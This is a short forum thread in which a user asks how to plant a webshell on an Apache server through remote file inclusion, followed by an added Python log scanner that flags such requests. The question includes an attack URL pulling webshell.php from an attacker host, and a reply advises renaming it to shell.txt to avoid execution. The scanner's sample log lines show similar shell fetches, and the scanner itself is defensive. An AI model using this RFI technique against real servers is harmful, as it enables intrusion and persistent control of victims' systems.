Webshells from remote file inclusion


TruePentest

Hello guys,

Can anyone tell me how to download a webshell.php file onto an Apache server through a remote file inclusion vulnerability without executing the PHP file? I can initiate a remote file inclusion like this: http://victim_machine/file.php?src=http://attack_machine/webshell.php but the Apache server executes the webshell.php file before downloading it. So when I try to read it on the victim machine there is nothing inside... Thank you


PHP is server-side code, so the site would only see the rendered output, not the executable PHP. Rename to shell.txt. Will only work if the site is vulnerable to true RFI, as some only echo back what they see, including plain text of executable code and scripts. Google OWASP, RFI and LFI.
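
Added example, not part of the original posts: seen from the defender's side, the request shape in the question leaves a recognizable trace in the Apache access log, namely a query parameter whose value is itself a remote URL. The sketch below flags such requests, including percent-encoded and mixed-case variants; the log lines, hosts and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request field of an Apache common/combined log line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# Parameter value that begins with a remote URL scheme
REMOTE_RE = re.compile(r'^\s*(?:https?|ftps?)://', re.IGNORECASE)

# Constructed sample lines (documentation IPs and .example hosts), not real traffic
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Mar/2024:10:01:02 +0000] "GET /file.php?src=http://attacker.example/shell.txt HTTP/1.1" 200 512',
    '203.0.113.7 - - [12/Mar/2024:10:01:09 +0000] "GET /file.php?src=hTTp%3A%2F%2Fattacker.example%2Fshell.txt HTTP/1.1" 200 512',
    '203.0.113.7 - - [12/Mar/2024:10:01:15 +0000] "GET /file.php?src=http%253A%252F%252Fattacker.example%252Fshell.txt HTTP/1.1" 200 0',
    '198.51.100.4 - - [12/Mar/2024:10:02:00 +0000] "GET /file.php?src=header.php HTTP/1.1" 200 2048',
    '198.51.100.4 - - [12/Mar/2024:10:02:05 +0000] "GET /search.php?q=what+is+http://+anyway HTTP/1.1" 200 900',
]

def fully_decode(value, rounds=3):
    """Undo layered percent-encoding (e.g. %253A -> %3A -> ':'), bounded to a few rounds."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def rfi_candidates(log_line):
    """Return [(param, decoded_value)] for query parameters whose value is a remote URL."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []  # not a parsable request line
    query = urlsplit(match.group("target")).query
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        decoded = fully_decode(value)  # parse_qsl already decoded one layer
        if REMOTE_RE.match(decoded):
            hits.append((name, decoded))
    return hits

def scan(lines):
    """Return [(line_number, hits)] for every line with at least one candidate."""
    return [(n, h) for n, h in ((i, rfi_candidates(l)) for i, l in enumerate(lines, 1)) if h]

if __name__ == "__main__":
    for lineno, hits in scan(SAMPLE_LOG):
        print(f"line {lineno}: remote URL in parameter(s) {hits}")
```

Legitimate URL-valued parameters (redirect targets, for example) also match, so pair the check with an allowlist of parameter names that are expected to carry URLs. On the PHP side, `allow_url_include = Off` is the setting that stops `include` from fetching remote URLs at all.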
